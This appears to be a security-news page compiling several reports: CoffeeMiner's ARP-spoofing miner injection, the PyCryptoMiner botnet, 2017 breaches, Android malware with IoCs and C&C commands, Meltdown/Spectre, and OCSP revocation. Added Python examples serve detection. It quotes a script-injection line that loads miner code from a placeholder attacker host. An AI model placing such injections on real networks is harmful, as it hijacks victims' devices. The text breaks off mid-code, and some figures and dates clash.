Saturday, May 3, 2025

CoffeeMiner – Hacking into WiFi Networks to Inject Cryptocurrency Miners


Cryptocurrency miners have been on the rise since last year: more than 500 million computers are mining cryptocurrency in their browsers without the user’s knowledge.

A developer named Arnau published the CoffeeMiner script which intercepts the traffic between the users and the routers to inject scripts into HTML pages.

Arnau published a PoC explaining how a MITM (Man(Person)-In-The-Middle) attack is performed to inject some JavaScript into HTML pages, forcing all the devices connected to a WiFi network to mine a cryptocurrency for the attacker.

Attack Scenario – CoffeeMiner

CoffeeMiner employs ARP spoofing to send spoofed messages onto a local area network (ARP is the protocol used for resolving a network-layer address (IP) into a link-layer address (MAC)).


mitmproxy is used to analyze the traffic flow and to edit the traffic data. Here he injected a line of code into HTML pages that calls the JavaScript cryptocurrency miner, which is deployed on the attacker machine.

Injected Code

<script src="http://httpserverIP:8000/script.js"></script>
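The ARP spoofing step described above leaves a visible trace on every affected client: the gateway's IP and the spoofing host's IP resolve to the same MAC address. The following is an added detection example, not code from CoffeeMiner or from the original article; the neighbour-table sample, addresses and function names are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed `ip neigh show` output from a client on a spoofed network:
# the gateway (10.0.2.1) and another host (10.0.2.20) share one MAC address.
SAMPLE_NEIGH = """\
10.0.2.1 dev wlan0 lladdr 08:00:27:aa:bb:cc REACHABLE
10.0.2.15 dev wlan0 lladdr 08:00:27:11:22:33 STALE
fe80::a00:27ff:fe11:2233 dev wlan0 lladdr 08:00:27:11:22:33 STALE
10.0.2.20 dev wlan0 lladdr 08:00:27:aa:bb:cc REACHABLE
10.0.2.30 dev wlan0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)


def parse_neigh(text):
    """Return (ip, dev, mac) for every IPv4 entry that has a resolved MAC."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if not m:
            continue  # FAILED / INCOMPLETE entries carry no lladdr
        ip = ipaddress.ip_address(m["ip"])
        if ip.version != 4:
            continue  # ARP is IPv4 only; a dual-stack host reuses its MAC legitimately
        entries.append((str(ip), m["dev"], m["mac"].lower()))
    return entries


def find_shared_macs(entries, gateway_ip):
    """Flag MAC addresses that answer for more than one IPv4 address on an interface.

    Proxy ARP and multi-homed routers can cause this legitimately, so a hit is a
    lead to investigate; a hit that involves the gateway deserves priority.
    """
    by_mac = defaultdict(set)
    for ip, dev, mac in entries:
        by_mac[(dev, mac)].add(ip)
    findings = []
    for (dev, mac), ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append({
                "dev": dev,
                "mac": mac,
                "ips": sorted(ips, key=ipaddress.ip_address),
                "involves_gateway": gateway_ip in ips,
            })
    return findings


def gateway_mac_changed(entries, gateway_ip, expected_mac):
    """True when the gateway resolves to a MAC other than a pinned baseline."""
    seen = {mac for ip, _dev, mac in entries if ip == gateway_ip}
    return bool(seen) and seen != {expected_mac.lower()}


if __name__ == "__main__":
    table = parse_neigh(SAMPLE_NEIGH)
    for finding in find_shared_macs(table, gateway_ip="10.0.2.1"):
        print(finding)
    # The baseline MAC below is a constructed value recorded on a known-good day.
    print("gateway MAC changed:",
          gateway_mac_changed(table, "10.0.2.1", "52:54:00:12:35:02"))
```

Pinning the gateway's MAC with a static ARP entry, or enabling dynamic ARP inspection on managed switches, removes the condition this check looks for.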

Arnau used the CoinHive JavaScript miner: “Coinhive offers a JavaScript miner for the Monero Blockchain that can be embedded into other Websites. The users run the miner directly in their Browser and mine XMR for the site owner in turn for an ad-free experience, in-game currency or whatever incentives they are availing to their users/visitors”.

He set up a VirtualBox environment to demonstrate this and also published a PoC video.

For now CoffeeMiner works only with HTTP and not with HTTPS. Arnau said he will be adding sslstrip to inject into HTTPS sites, and an autonomous Nmap scan to add the IPs detected to the CoffeeMiner victims list.

The complete source code of CoffeeMiner is published on GitHub.

PyCryptoMiner – A New Linux Crypto-miner Botnet Spreading over the SSH Protocol to Mining Monero

A highly sophisticated Python-script-based Linux crypto-miner botnet called PyCryptoMiner is abusing the SSH port and targeting Linux users to mine Monero cryptocurrency.

It is written in Python, which makes it difficult to detect, and this crypto-miner botnet uses over 36,000 domains that are related to scams, gambling, and adult services.

This crypto-miner mainly focuses on mining Monero, and as of December researchers estimated that it has made approximately US $46,000 mining Monero.

If the original command and control server becomes unreachable, it leverages Pastebin.com/WHATHAPPEN to receive a C&C server assignment.

Current crypto-mining malware mainly uses scripts that are heavily obfuscated, easily evade detection, and are very difficult to detect by nature.


How Does This Linux Crypto-miner Work

This crypto-miner botnet uses a brute-force attack to guess the SSH login credentials of the Linux machine.

Before connecting to the command and control server, it deploys the base64-encoded spearhead Python script and executes the obfuscated spearhead Python script.

In most cases malware is hardcoded with the command & control server, so once it’s taken down the malware cannot connect to another C&C server.

But here the attacker uses Pastebin.com as an alternative if the original C&C server goes down.

According to F5 Networks, “Being exposed as a public Pastebin.com resource allowed us also to discover more information about this operation. It seems to have been running since at least August of this year because the username “WHATHAPPEN” created the resource on Aug. 21, 2017.”

This pastebin.com resource is accessed continuously when the original C&C server goes down, and this resource had been viewed 177,987 times.

Its execution flow starts by executing the spearhead Python script, which leads to a base64-encoded Python script being fetched from the C&C server and executed.

It will be the main controller of the infected machine, which acts as part of the botnet. The original spearhead bash script named httpsd includes a base64-encoded Python one-liner that runs every 6 hours.

It is used to collect the host/DNS name, OS name and architecture, number of CPUs, and CPU usage once it takes over the target machine.
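A scheduled job that decodes base64 and hands the result to a Python interpreter, as described above, is easy to hunt for on a host. The following is an added triage example, not code from the malware or from the F5 report; it assumes the six-hour schedule is implemented as a crontab entry (the article does not say how), and the crontab lines, payload and function names are constructed.

```python
import base64
import binascii
import re

# Constructed, harmless payload and crontab lines for demonstration only.
_PAYLOAD = base64.b64encode(b'print("hello")').decode()
SAMPLE_CRONTAB = f"""\
# m h dom mon dow command
15 3 * * * /usr/local/bin/backup.sh
0 */6 * * * python -c "import base64;exec(base64.b64decode('{_PAYLOAD}'))"
*/5 * * * * echo {_PAYLOAD} | base64 -d | python
30 2 * * 0 python3 /opt/reports/weekly.py
"""

PYTHON_RE = re.compile(r"\bpython[0-9.]*\b")
DECODE_RE = re.compile(r"b64decode|base64\s+(?:-d|--decode)\b")
TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def try_decode(token):
    """Decode a base64-looking token; return None if it is not valid base64."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def find_encoded_python_jobs(crontab_text):
    """Return cron entries that both invoke Python and decode base64.

    Each finding carries the schedule, the raw command and the decoded text of
    any embedded base64 blobs, so an analyst can read what would be executed.
    """
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # environment assignments and malformed lines
        schedule, command = " ".join(fields[:5]), fields[5]
        if not (PYTHON_RE.search(command) and DECODE_RE.search(command)):
            continue
        decoded = [text for text in map(try_decode, TOKEN_RE.findall(command))
                   if text is not None]
        findings.append({"schedule": schedule, "command": command,
                         "decoded": decoded})
    return findings


if __name__ == "__main__":
    for job in find_encoded_python_jobs(SAMPLE_CRONTAB):
        print(job["schedule"], "->", job["decoded"])
```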

The 2 pool addresses discovered in use by this botnet were paid approximately 94 and 64 Monero, which is around $60,000 USD.


Top 10 Biggest Data Breaches Of 2017


Last year many cyber incidents were reported. Here is a look back at the Top 10 Biggest Data Breaches and leaks reported in 2017, which made a huge impact on the organizations.

Here we have listed the Top 10 Biggest Data Breaches, which cost companies millions of dollars and loss of reputation.


1. Equifax

Hackers had breached the company’s system and accessed people’s names, Social Security numbers, birth dates, addresses and, in some instances, driver’s license numbers.

They also stole credit card numbers for about 209,000 people and dispute documents with personal identifying information for about 182,000 people.

2. Yahoo

Yahoo announced that all user accounts were affected in the August 2013 theft. Previously they announced that “more than one billion user accounts” may have been stolen by hackers during the attack that took place in August 2013.

Leaked details still remain secret, besides the range of affected users and that hackers stole names, email addresses, date of birth, phone numbers, hashed passwords, safety questions and answers.

3. American Households

A massive database containing sensitive personal information on 123 million American households was leaked online by a California-based data analytics firm.

A cloud-based data repository was left publicly exposed due to a misconfiguration in Amazon Web Services S3 cloud storage; the repository holds massive data sets belonging to Experian, a consumer credit reporting agency and Alteryx partner.

4. Accenture Data Leak

A server hosted on Amazon’s S3 storage service, holding 137 gigabytes of customer data, was left completely unsecured, which could affect the sensitive data of tons of Accenture Cloud Platform customers.

The exposed cloud data servers belong to Accenture’s enterprise cloud offering, Accenture Cloud Platform, a “multi-cloud management platform” that is used by Accenture customers.

5. Uber Data Breach

In the Uber data breach, hackers stole the data of 57 million Uber users around the world and the names of 600,000 drivers, including their license numbers.

The breach took place in October 2016 and the leaked data includes names, email addresses and mobile phone numbers related to Uber accounts.

6. California Voter Database Exposed

An unprotected MongoDB database containing a large volume of California state voter information was exposed online. It could be accessed by anyone with just a simple internet connection, and the database was named ‘cool_db’.

Also, the entire database, which contains 2 collections, was open for anyone to view, edit and modify.

One collection contains a set of voter registration data and the other collection contains the entire California state voter data, holding 19,264,123 records, all open for public access.

7. Malaysian Data Breach

Malaysia’s biggest data breach exposed around 46.2 million mobile phone numbers, leaked online from Malaysian telecoms and mobile virtual network operators (MVNO).

The information that has got out includes postpaid and prepaid numbers, customer details, addresses, IMEI and IMSI numbers.

8. Verizon Data Breach

Sensitive personal data of 6 million customers of telecommunications giant Verizon leaked online due to a misconfigured cloud-based file repository; this misconfiguration left customer phone numbers, names, and some PIN codes publicly available online.

This data breach occurred due to “human error”, and Verizon’s cloud-based file server was operated by Verizon’s third-party vendor NICE Systems.

9. Pentagon’s Data Leak

In the Pentagon data leak, Amazon Web Services S3 cloud storage buckets containing social media surveillance data were configured in such a way that users with a free AWS account could read and download the contents.

Leaked data consists of billions of public internet posts, news commentary and other writings from individuals from the US and other countries.

10. Ai.Type Keyboard Data Breach

Personal data of millions of customers was exposed online due to a misconfiguration of a MongoDB database that belongs to Ai.Type, the company well known for developing the personalized virtual keyboard app for Android and iOS.

The company exposed its entire 577GB Mongo-hosted database in public; anyone with an internet connection could access the database.

36 Malicious Android Apps Removed From Google Play Store that Mimics as Famous Security Tools


Several malicious Android apps that posed as legitimate security tools and other categories of Android apps have been removed from the Google Play Store.

Exactly 36 apps are listed in this category; they performed similar tasks and also carried out dangerous activities such as secretly harvesting user data, tracking user location, and aggressively pushing advertisements.

These 36 apps masquerade under legitimate-sounding names such as Security Defender, Security Keeper, Smart Security, Advanced Boost, and more.

They advertise features including scanning, cleaning junk, saving battery, cooling the CPU, locking apps, as well as message security and WiFi security.


How Do These Malicious Android Apps Work

Once installed by the user, the apps appear neither in the device launcher’s list of applications nor as shortcuts on the device screen.

So users can see only the security-warning notifications and pop-up windows.

These apps are designed with explicit hiding behaviour for specific mobile devices such as LG, Xiaomi, Nexus, ZTE N958St etc.

So this malware does not perform any specific task on the above-listed mobile models; the malware authors designed it this way to evade the Google Play Store security scan.

The security-tool-related malicious apps among these 36 apps show fake scanning results to convince users that they are infected with some kind of malware.

But according to the Trend Micro report, “we found that most detection results from the notifications are false. For example, if the user installs another app, then it will immediately be reported as suspicious. Or the user will be sent notifications like “10.0 GB files are being wasted,” which will prompt some kind of action.
But the data shown in these messages are fake — they are just used to add a layer of legitimacy to the app.”

Also, the malware authors designed these apps to make users believe that they are actually affected by some kind of vulnerability, by showing an animation with a vulnerability name.

Once it gains the user information, it is also able to collect the victim’s private data, including specific location details, and send them to a remote server.

It also shows many different advertisements; aggressive ads show up in many different scenarios.

All the malicious apps have been reported to Google and all the apps were removed from the Google Play Store.

LightsOut – Malicious Flashlight Apps on Google Play with Nearly 7.5 Million Downloads


A new adware spotted on Google Play contains scripts that override the user’s decision to disable ads outside of a legitimate context. It hides its icon, which makes the detection and removal process difficult.

The malware, dubbed LightsOut, was spotted by Check Point security researchers and reported to Google, who have now removed the apps from the Play Store. The malware hides in 22 utility and flashlight apps, which reached almost 7.5 million downloads.

Researchers said, “The deception was far-reaching in its disruption to the user. Some users noted that they were forced to press on ads to answer calls and perform other activities on their device. Indeed, another user reported that the malicious ad activity continued even after he purchased the ad-free version of the app, taking the abuse to a whole new level.”

How it works and its purpose – LightsOut

It embeds a malicious SDK file into legitimate flashlight and utility apps; researchers found multiple malicious capabilities in the samples analyzed.


Once launched, the app hides its icon, which makes it harder for the user to halt the process and remove the app. It offers a control panel to enable or disable services, including the option to disable ads.

Even if users choose to disable ads, ‘LightsOut’ overrides this and continues to display ads out of context. The purpose of the ads is to generate illegal revenue from users. The ad events are triggered at the end of a call, on a Wi-Fi connection, when a charger is plugged in or when the screen is locked.

Researchers said, “since the ads are not directly connected to ‘LightsOut’s activity, the user is unlikely to understand what caused them. And, even if they do realize the app is to blame, they won’t be able to find the app’s icon and remove it from their device.”

Infected Packages on Play Store

Package Name | Downloads (Min) | Downloads (Max)
com.smart.swipe.whitedot | 50,000 | 100,000
com.wifi.network.realtime | 10,000 | 50,000
pro.filetrans.app | 5,000 | 10,000
com.network.guard.tool | 1,000 | 5,000
com.brightest.ledflashlight | 1,000 | 5,000
com.arc.voice.recorder.pro | 1,000 | 5,000
pro.freewifi.password | 10,000 | 50,000
com.call.recorder.pro | 100,000 | 500,000
com.solidunion.callrecorder | 1,000,000 | 5,000,000
com.realtime.app.cleaner | 10,000 | 50,000
com.nfl.flashlight | 5,000 | 10,000
hd.background.wallpaper.theme | 100,000 | 500,000
com.ledflashlight.cool | 10,000 | 50,000
com.master.wifikey.booster | 100,000 | 500,000
com.wifimaster.network.speedtest | 50,000 | 100,000
com.freewifi.connect.booster | 100,000 | 500,000
com.brightest.ledflashlight.almighty | 5,000 | 10,000
com.brightest.ledflashlight.best | 10,000 | 50,000
rec.call.recording.manager | 1,000 | 5,000
com.smart.freewifi.booster | 1,000 | 5,000
com.brightest.ledflashlight.pro | 10,000 | 50,000
com.dr.clean.lite | 5,000 | 10,000
Total | 1,585,000 | 7,565,000

SHA-256 Hashes:

f5b98f91c4ccb6f9530434adce285e25e503a7afb6ea97a03bea57c319cd2fbc 52209fa52052b8086ae5213d0a51c053ca07a6f36a131f2627be55db17f39ae7

U.S Department of Homeland Security Data Breach Affected 246,167 Federal Government Employees


A privacy incident involving the DHS Office of Inspector General Case Management System exposed the sensitive personal information of 246,167 federal government employees, and DHS believes that this was not a cyber-attack by external actors.

This incident exposed PII for these individuals, including names, Social Security numbers, dates of birth, positions, grades, and duty stations.

The data breach affected employees only if they were employed by DHS in 2014 or associated with a DHS OIG investigation from 2002 through 2014.

This unauthorized activity was found on May 10, 2017, during a criminal investigation being conducted by DHS OIG and the U.S.

During this investigation, DHS OIG discovered an unauthorized copy of its investigative case management system in the possession of a former DHS OIG employee.


According to the evidence, affected individuals’ personal information was not the primary target of the unauthorized transfer of data.

This incident has been divided into 2 groups. The first group consists of approximately 247,167 current and former federal employees that were employed by DHS in 2014.
The second group is comprised of individuals (i.e., subjects, witnesses, and complainants) associated with DHS OIG investigations from 2002 through 2014 (the “Investigative Data”).

Based on the DHS investigation evidence, this personal information was not a primary target of the exfiltration.

In this case, DHS offered 18 months of free credit monitoring and identity protection services for all the individuals potentially affected by this privacy incident.

This service entails credit monitoring and a $1 million identity theft insurance policy; a separate identity repair policy is intended to address issues related to credit restoration or recovery of financial losses.

DHS Chief Privacy Officer Philip S. Kaplan said DHS is implementing additional security precautions to limit which individuals have access to this information and will better identify unusual access patterns.

We will continue to review our systems and practices in order to better secure data. DHS OIG has also implemented a number of security precautions to further secure the DHS OIG network.

Dangerous Android Malware Targets 232 Banking Apps (Axis,HDFC,SBI,ICICI) and Cryptocurrency Apps


A new Android banking Trojan has been identified targeting more than 232 mobile banking apps, including the mobile apps of major Indian banks.

The malware is detected by Quick Heal as Android.banker.A2f8a. It is distributed through third-party stores via a fake Flash Player app and through the Play Store.

It targets banking apps, cryptocurrency apps and other financial apps, along with apps such as Amazon Shopping, Airbnb, Poker Stars etc.

The malware is designed like any other banking malware and has the following capabilities.

  • Displaying an overlay over legitimate apps to steal credentials.
  • Uploading contact lists and SMS to malicious C&C servers.
  • Hijacking SMS (checking for OTP responses)

Android Malware Infection

Once installed, the app throws successive popups until it gets admin rights, even if the user kills the process. Once it obtains permission from the user, it hides the app and carries out malicious tasks.

It checks for the targeted apps on the phone, and if it finds any it shows a fake popup on behalf of the targeted banking app; if the user clicks on it, it shows a fake login screen requesting login details.

According to Quick Heal researchers, the malware is capable of performing the following commands from the C&C server.

Command | Action
Send_GO_SMS | Send an SMS
GetSWSGO | Collect all SMS from the device
nymBePsG0 | Upload list of contacts to a malicious server
telbookgotext | Send SMS to all contacts with the text from its command
StartAutoPush | Show fake notification
RequestPermissionInj | ACCESSIBILITY Permission
RequestPermissionGPS | GPS Permission
killBot | Set all URLs null in Shared Preferences
getIP | Upload location to a malicious server
ussd | Send a USSD request

It shows a fake notification with the title “Urgent message!” and the text “Confirm your account”; if the user clicks on the notification, it takes them to the login page. Also, the malware silences the phone, hijacks SMS for OTP details and is capable of sending SMS. Quick Heal published the technical analysis.

List of Mobile Banking Apps Targeted in India

axis.mobile (Axis Mobile)
sap work.hdfc (HDFC Bank MobileBanking)
sbi.SBIFreedomPlus (SBI Anywhere Personal)
hdfcquickbank (HDFC Bank MobileBanking LITE)
csam.icici.bank.imobile (iMobile by ICICI Bank)
snapwork.IDBI (IDBI Bank GO Mobile+)
idbibank.abhay_card (Abhay by IDBI Bank Ltd)
com.idbi (IDBI Bank GO Mobile)
idbi.mpassbook (IDBI Bank mPassbook)
co.bankofbaroda.mpassbook (Baroda mPassbook)
unionbank.ecommerce.mobile.android (Union Bank Mobile Banking)
unionbank.ecommerce.mobile.commercial.legacy (Union Bank Commercial Clients )

Popular Targeted Shopping Apps

amazon.mShop.android.shopping (Amazon Shopping)
amazon.windowshop (Amazon for Tablets)
eBay.mobile (eBay: Buy & Sell. Explore Discount Shopping Deals)
airbnb.android (Airbnb)
scores365 (365Scores: Sports Scores Live)

IoC of Attack

App Name: Flash Player
Package name: yqyJqWdtdf.UOaOrquyRDgLFgGueha
MD5: 29cf5cc309c2e29b6afd63eb5ab8fbd2
Size: 115 KB

Common Defences On Mobile Threats

Give careful consideration to the permission asked for by applications.
Download applications from trusted sources.
Stay up to date with the latest version.
Encrypt your devices.
Make frequent backups of important data.
Install anti-malware on your devices.
Stay strict with CIA Cycle.

Nearly Every CPU’s Since 1995 are Vulnerable to “Meltdown” and “Spectre” Attacks


A critical vulnerability published by Google affects almost all processors since 1995; the vulnerability resides in “speculative execution”, a technique used by modern processors for processor optimization.

The hardware bugs Meltdown and Spectre allow an attacker to steal data currently being processed on the computer, including personal photos, emails, password manager contents, instant messages and sensitive documents.

Security researchers from Google Project Zero discovered the vulnerability, and it is similar to the bug reported in Intel processors. Programs are normally not allowed to read data from other programs, but researchers say “a malicious program can exploit Meltdown and Spectre to get hold of secrets stored in the memory of other running programs”.

What are Meltdown and Spectre

Meltdown breaks the separation between the user accounts and the operating system; it allows access to memory, from which an attacker can extract secret information belonging to other programs and the operating system.

It breaks all security assumptions given by address space isolation as well as para-virtualized environments and, thus, every security mechanism building upon this foundation. There is no software vulnerability involved in Meltdown.

Spectre breaks the isolation between applications; it allows an attacker to trick legitimate applications into leaking their secrets.

Spectre attacks involve inducing a victim to speculatively perform operations that would not occur during correct program execution and which leak the victim’s confidential information via a side channel to the adversary.

Devices Affected

The attack works on mobile devices, personal computers and, depending on the cloud provider, cloud infrastructure.

Antivirus won’t detect these attacks the way it detects malware, but it may detect malware that uses the attacks by comparing binaries after they become known.

Meltdown affects desktop, laptop, and cloud computers; it affects every processor since 1995 except Intel Itanium and Intel Atom before 2013. Researchers have tested the exploits only on Intel processors at this time, whereas ARM and AMD processors have not been tested.

Spectre affects laptops, smartphones, desktops and cloud servers; it affects all modern processors that keep data in flight, including Intel, AMD, and ARM processors.

CVE in Reference

CVE-2017-5753 and CVE-2017-5715 are the references to Spectre; CVE-2017-5754 is for Meltdown.

Mitigation

Spectre can be mitigated if speculative execution can be halted on potentially sensitive execution paths.

Serialization instructions may not be an effective countermeasure on all processors or system configurations.

Intel Processors Vulnerability Allows Normal User Programs To Access The Protected Memory in the Kernel


A critical hardware design flaw in Intel processors, present at the kernel level, affects both Windows and Linux kernels and lets attackers abuse the most sensitive kernel-level privileges.

This critical kernel vulnerability affects all operating systems, including Windows, Linux and macOS, and leads to a slowdown of at least five to 30 percent.

It is present in all recent Intel processors and allows normal users to access the protected memory in the kernel.

The kernel inside a chip is basically an invisible process that facilitates the way apps and functions work on your computer.

It has complete control over your operating system. Your PC needs to switch between user mode and kernel mode thousands of times a day.

This critical vulnerability exists in Intel x86 CPUs produced over the past 10 years, and initially this flaw was reported only in Intel-based chips.

But Intel responded that reports that these exploits are caused by a “bug” or a “flaw” and are unique to Intel products are incorrect. Based on the analysis to date, many types of computing devices — with many different vendors’ processors and operating systems — are susceptible to these exploits.


What is the Major Impact of this Kernel Vulnerability

This kernel vulnerability is categorized as an extremely technical flaw in the kernel, affecting not only Intel-based processors but also those of other vendors such as AMD and ARM.

With this flaw, the chip’s kernel leaks memory that can be accessed by users with user-mode privileges who interact with the kernel, so sensitive data can be exposed by attackers.

Even more, an attacker can install a normal program on the computer and later read a password stored in kernel memory that has been encrypted with the private key.

Since the kernel is the core of an operating system, it is the process that handles the most sensitive tasks in your system. So this is considered one of the serious flaws that should be fixed by operating system vendors and hardware vendors.

Intel said, “Intel and other technology companies have been made aware of new security research describing software analysis methods that, when used for malicious purposes, have the potential to improperly gather sensitive data from computing devices that are operating as designed.”

“Intel believes these exploits do not have the potential to corrupt, modify or delete data.” AMD denied that its chips are affected.

According to The Register, “A fundamental design flaw in Intel’s processor chips has forced a significant redesign of the Linux and Windows kernels to defang the chip-level security bug.
Programmers are scrambling to overhaul the open-source Linux kernel’s virtual memory system. Meanwhile, Microsoft is expected to publicly introduce the necessary changes to its Windows operating system in an upcoming Patch Tuesday.”

Since it is a highly technical kernel vulnerability, users cannot perform any mitigation themselves. All users are urged to check with their operating system vendor or system manufacturer and apply any available updates as soon as they are available.

SSL/TLS Certificate Revocation is Broken Time for More Reliable Revocation Checking Mechanism


We are moving fast to an encrypted world and the usage of TLS certificates has increased dramatically. Security researcher Scott Helme discovered a way to break the certificate revocation checking mechanism.

The process of getting a certificate has become simpler over time, and it is now also free to get one.

In order to get a certificate, we send a Certificate Signing Request (CSR) to the Certificate Authority (CA) and the CA will challenge us to prove our ownership of the domain. This is usually done by setting a DNS TXT record or by email.

Once it has been satisfied, the CA will issue a certificate, which then needs to be installed on the server where our domain is hosted to get the green padlock and HTTPS in the address bar.

Public and Private keys

The certificates that we use for HTTPS are public documents; we send them to anybody that connects to our site. What stops other people from using our certificate is that they don’t have our private key. When a browser establishes a secure connection to a site, it checks that the server has the private key for the certificate it’s trying to use; this is why no one else can use our certificate. If an attacker gets our private key, though, that changes things.

If an attacker steals our private key, they can prove that they are us. There are a number of ways that private keys are revealed by accident or carelessness.

You may remember Heartbleed, a small flaw in OpenSSL which allowed attackers to steal your private key, and you didn’t need to do anything wrong for it to happen.

If the private key is exposed, the only way to stop the attacker is to revoke the certificate by contacting the CA.

Certificate revocation

Revoking the certificate ensures that an attacker can’t abuse it. Once a certificate is marked as revoked the browser will know not to trust it, even though it’s valid. The owner has requested revocation and no client should accept it.

When we know we’ve had a compromise we contact the CA and ask that they revoke our certificate. We need to prove ownership of the certificate in question and once we do that, the CA will mark the certificate as revoked.

The problem is that the browser is not aware that the certificate has been revoked; this is addressed by two mechanisms, the Certificate Revocation List (CRL) and the Online Certificate Status Protocol (OCSP).

Certificate Revocation Lists

A Certificate Revocation List (CRL) is a list of certificate serial numbers which have been revoked, are not any more legitimate, and should not be relied upon by any system user.

A CRL is generated periodically and is always issued by the CA which issues the corresponding SSL certificates. All CRLs have an (often short) lifetime in which they are valid and in which they may be consulted by a PKI-enabled application to verify a counterpart’s certificate prior to its use.

To counter spoofing or denial-of-service attacks, CRLs are usually signed by the issuing CA and therefore carry a digital signature.

The problem with a CRL is that they contain a lot of revoked certificates from the particular CA. The other problem is that if the client doesn’t have a fresh copy of the CRL, it has to fetch one during the initial connection to the site which can make things look much slower than they actually are.

Online Certificate Status Protocol

The Online Certificate Status Protocol (OCSP) is an Internet protocol used for obtaining the revocation status of an X.509 digital certificate. With OCSP we ask the CA for the status of a single, particular certificate.

This means all the CA needs to do is respond with a good/revoked answer, which is considerably smaller than a CRL.

OCSP indeed offered a significant performance advantage over fetching a CRL. When you send an OCSP request, you’re basically asking the CA this:

Is the certificate for gbhackers.com valid?

Hard Fail

Upon receiving the certificate, the browser will reach out to one of these services and perform the necessary query to ultimately ascertain the status of the certificate. What if your CA is having a bad day and the infrastructure is offline?

The browser has only two choices here. It can refuse to accept the certificate because it can’t check the revocation status or it can take a risk and accept the certificate without knowing the revocation status.

Both of these options come with their advantages and disadvantages. If the browser refuses to accept the certificate then every time your CA has a bad day and their infrastructure goes offline, your sites go offline too.

If the browser continues and accepts the certificate then it risks using a certificate that could have been stolen and exposes the user to the associated risks. It’s a tough call, but right now, today, neither of these actually happens.

Soft Fail

What actually happens today is that a browser will do what we call a soft-fail revocation check. That is, the browser will try to do a revocation check but if the response doesn’t come back, or doesn’t come back in a short period of time, the browser will simply forget about it.

Even worse is that Chrome doesn’t even do revocation checks, at all. Yes, you did read that right, Chrome doesn’t even try to check the revocation status of certificates that it encounters.

Firefox looks like they will be joining the party very soon too. The problem we had with hard fail was obvious, the CA has a bad day and so do we, that’s how we arrived at soft fail. The browser will now try to do a revocation check but will ultimately abandon the check if it takes too long or it appears the CA is offline.

If you have an attacker performing a MiTM attack all they need to do is simply block the revocation request and make it look like the CA is offline. The browser will then soft fail the check and continue on to happily use the revoked certificate.

Adam Langley at Google came up with the best description for what revocation is, it’s a seatbelt that snaps in a car crash, and he’s right. You get in your car every day and you put your seatbelt on and it makes you feel all warm and fuzzy that you’re safe. Then, one day, things don’t quite go to plan, you’re involved in a crash and out of the windscreen you go. The one time you needed it, it let you down.

Fixing the problem

Right now at this very moment in time, the truth is that there is no reliable way to fix this problem, revocation is broken. There are a couple of things worth bringing up though and we may be able to look to a future where we have a reliable revocation checking mechanism.

Proprietary mechanisms

If a site is compromised and an attacker gets hold of the private key they can impersonate that site and cause a fair amount of harm. That’s not great but it could be worse. What if a CA was compromised and an attacker got access to the private key for an intermediate certificate?

That would be a disaster because the attacker could then impersonate pretty much any site they like by signing their own certificates. Rather than doing online checks for revocation of intermediate certificates, Chrome and Firefox both have their own mechanisms that work in the same way.

Chrome calls theirs CRLSets and Firefox calls theirs OneCRL, and they curate lists of revoked certificates by combining available CRLs and selecting certificates from them to be included. So, we have high-value certificates like intermediates covered, but what about you and I?

OCSP Must-Staple

To explain what OCSP Must-Staple is, we first need a quick background on OCSP Stapling. I’m not going to go into too much info, you can get that in my blog on OCSP Stapling, but here is the TL;DR.

OCSP Stapling saves the browser having to perform an OCSP request by providing the OCSP response along with the certificate. It’s called OCSP Stapling because the idea is that the server would ‘staple’ the OCSP Response to the certificate and provide both together.

At first glance, this seems a little odd because the server is almost ‘self-certifying’ its own certificate as not being revoked, but it all checks out. The OCSP response is only valid for a short period and is signed by the CA in the same way that the certificate is signed.

So, in the same way the browser can verify the certificate definitely came from the CA, it can also verify that the OCSP response came from the CA too. This solves the massive privacy concern with OCSP and also removes a burden on the client from having to perform this external request.

Winner! But not so much actually, sorry. OCSP Stapling is great and we should all support it on our sites, but, do we honestly think an attacker is going to enable OCSP Stapling? No, I didn’t think so, of course they aren’t going to.

What we need is a way to force the server to OCSP Staple and this is what OCSP Must-Staple is for. When requesting our certificate from the CA we ask them to set the OCSP Must-Staple flag in the certificate.

This flag instructs the browser that the certificate must be served with an OCSP Staple or it has to be rejected. Setting the flag is easy.

Now that we have a certificate with this flag set, we as the host must ensure that we OCSP Staple or the browser will not accept our certificate. In the event of a compromise and an attacker obtaining our key, they must also supply an OCSP Staple when they use our certificate too.

If they don’t include an OCSP Staple, the browser will reject the certificate, and if they do include an OCSP Staple then the OCSP response will say that the certificate is revoked and the browser will reject.
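The sketch below models the hard-fail, soft-fail and Must-Staple outcomes described above from the browser's side. It is an added example, not code from the original article or from any browser. It assumes the Must-Staple flag is carried as the X.509 TLS Feature extension (OID 1.3.6.1.5.5.7.1.24) listing `status_request` (5), and that signature and freshness checks on any OCSP response have already passed. The function names and the sample extension bytes are constructed for illustration.

```python
STATUS_REQUEST = 5  # TLS extension number for status_request (OCSP stapling)

# Constructed sample: DER value of a TLS Feature extension, SEQUENCE { INTEGER 5 }.
MUST_STAPLE = bytes.fromhex("3003020105")

def parse_tls_features(der):
    """Parse a TLS Feature extension value (DER SEQUENCE OF INTEGER).
    Only short-form lengths are handled, which is enough for this extension."""
    if len(der) < 2 or der[0] != 0x30 or der[1] != len(der) - 2:
        raise ValueError("expected a short-form DER SEQUENCE")
    features, i = [], 2
    while i < len(der):
        if i + 2 > len(der) or der[i] != 0x02:
            raise ValueError("expected a DER INTEGER")
        length = der[i + 1]
        body = der[i + 2 : i + 2 + length]
        if length == 0 or len(body) != length:
            raise ValueError("truncated INTEGER")
        features.append(int.from_bytes(body, "big"))
        i += 2 + length
    return features

def browser_accepts(policy, tls_feature, staple, ocsp_answer):
    """Decide whether a (hypothetical) client accepts the certificate.

    policy      -- "hard-fail" or "soft-fail"
    tls_feature -- TLS Feature extension bytes from the certificate, or None
    staple      -- "good", "revoked" or None: status in the stapled response
    ocsp_answer -- "good", "revoked" or None: result of the client's own
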